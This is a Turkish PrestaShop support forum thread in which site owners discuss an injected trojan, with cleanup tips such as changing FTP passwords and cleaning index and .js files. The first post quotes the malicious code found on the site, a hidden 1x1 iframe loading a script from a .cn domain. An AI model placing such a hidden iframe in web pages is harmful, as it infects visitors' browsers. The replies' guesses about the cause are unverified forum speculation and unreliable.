Neler yeni
Presta-TR

Forumumza kayıt olarak hem destek alabilir hem de destek verebilirsiniz!

Şimdiden aramıza hoş geldiniz.

Ciddi sorun

xpclt

Yeni Üye
merhaba arkadaslar.. bu sabah siteme girdiğimde antivirüs programın benim kendi sitemden Trojan programı Exploit.JS.Agent.afh URL: http://liteautorepair.cn/index.php indirmeye çalıştığını tespit ettim (ilk önce herkes kontrol etsin sitesini) ve bir kaç coder arkadasıma sorduğumda bu sorunun scriptten kaynaklanabileceğini söylediler bende böyle bir şey olup olmadığını teyit etmek için konu açarak sormak istedim bir fikri olan varmı ?

kod şu şekilde en alt satırda
<iframe src="http://namebuypicture.cn/in.cgi?income32" width=1 height=1 style="visibility: hidden"></iframe>
saygılar..

Cvp:Ciddi sorun

Bende bir müşterim için bu tip bir trojan yakalamıştım yanlız yedek alırken bunu buldu. sunucudan kaynaklanma olasılığı daha yüksek. scriptte sıkıntı olsaydı her yerde bu yazılırdı. Sunucuda çalışan diğer domainleri kontrol edin muhtemelen tüm domainlerde bu sıkıntı vardır.

sonucu burdan yazın
teşekkürler

presta zaten benim ihtiyacımı fazlası ile karşılıyor zaten fakat trojan sorun bir olaydır bunu herkes bilir müşterilermizin gözünde iyi itibarımız varken birden bire bunu yerin altına düşmesi elbette hiç hoş bir durum değil ben sorunumu dosyaları yeniden yükleyerek hallettim fakat sunucuda bulunan diğer siteleride inceledim fakat hiç birisinde o yukarıda adı geçen trojan kodunu göremedim şu anlık bir sorun olmadığını belirtmek istedim

iyi çalışmlar..

Aynı sorun bende de var bu sorun ne sunucudan nede yazılımdan kaynaklanıyor. Ftp programına sızan bir olay diye düşünüyorum ben. Çünkü 2 tane ayrı hostum ve kullandığım 3 ayrı script var bu sorun hepsinde var. Hangisine dosya attıysam ertesi gün bu sorunla karşılaştım. Hala temizlemekle uğraşıyorum herşeye format attım ama yok. Son şare şifreleri değiştim bakalım ne olacak....

bu sorun eğer Crackli olarak Cute FTP kullanıyorsanız ondan kaynaklanıyor ben çok oldu bu sorunu çözeli aklınızda olsun

Cvp:QQWEQWED, 958598768. HELLO WORLD@!!)))

iframe virüsü ftp programından dosya aktarırken bulaşır ve aşağıdaki uzantılı dosyalara bulaşır

önce ftp şifrelerinizi değişin
bu virüsün bulaştığı dosyalar

index.php
index.html
index.htm
ve .js
uzantılı dosyalarınızdan bu virüsü tek tek temizleyin yoksa tarayıcınız çok kasar zor açılır diğer sitelerinizede ftp yoluyla bulaşabilir.

plex panelinizden temizlemenizi öneririm.

Üst Alt